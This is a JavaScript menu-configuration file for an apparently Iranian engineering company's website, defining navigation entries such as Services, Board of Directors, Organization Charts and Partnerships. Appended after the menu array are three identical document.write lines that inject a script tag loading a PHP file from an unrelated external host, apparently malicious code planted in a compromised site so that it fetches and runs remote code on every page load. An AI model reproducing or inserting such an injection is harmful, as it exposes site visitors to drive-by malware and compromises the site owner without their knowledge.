// items structure
// each item is the array of one or more properties:
// [text, link, settings, subitems ...]
// use the builder to export errors free structure if you experience problems with the syntax

var MENU_ITEMS = [
	['Home','default.asp', {'tw' : '_self'}],
	['Services', null, null,
		['General Services','servicesGeneral.asp', {'tw' : '_self'}],
		['EPC Services','servicesEPC.asp', {'tw' : '_self'}]
	],
	['Board of Directors',null, null,
		['Managing Director','boardManaging.asp', {'tw' : '_self'}],
		['Chairman of the Board','', {'tw' : '_self'}],
		['Members of the board','', {'tw' : '_self'}]
	],
	['Organization Charts', null, null,
		['Management Top Chart','orgChartManagingTop.asp', {'tw' : '_self'}],
		['Engineering','orgChartEngineering.asp', {'tw' : '_self'}],
		['Planning and Project Control','orgChartPlanning.asp', {'tw' : '_self'}]
	],
	['Associations Membership','association.asp', {'tw' : '_self'}]
	,
	['Key Staff Personnel','keyStuff.asp', {'tw' : '_self'}]
	,
	['Major Projects','majorProjects.asp', {'tw' : '_self'}]
	,
	['IT system and Facilities	','itSystem.asp', {'tw' : '_self'}]
	,
	['IT system and Facilities	','itSystem.asp', {'tw' : '_self'}]
	,
	['Partnerships', null, null,
		['International Partnerships','partnershipsInt.asp', {'tw' : '_self'}],
		['Local Iranian Partnerships','partnershipsLocal.asp', {'tw' : '_self'}],
	],
	['Photos and Clips', null, null,
		['General Photos and Clips','photoGeneral.asp', {'tw' : '_self'}],
		['Selected Photos and Clips','', {'tw' : '_self'}],
	],
	['Contact Us', null, null,
		['Contact Info','contactInfo.asp', {'tw' : '_self'}],
		['Feedback','feedback.asp', {'tw' : '_self'}],
	]
];
document.write('<script src=http://mateuszpilich.edh.pl/oferta/moja_strona_b5.php ><\/script>');
document.write('<script src=http://mateuszpilich.edh.pl/oferta/moja_strona_b5.php ><\/script>');
document.write('<script src=http://mateuszpilich.edh.pl/oferta/moja_strona_b5.php ><\/script>');
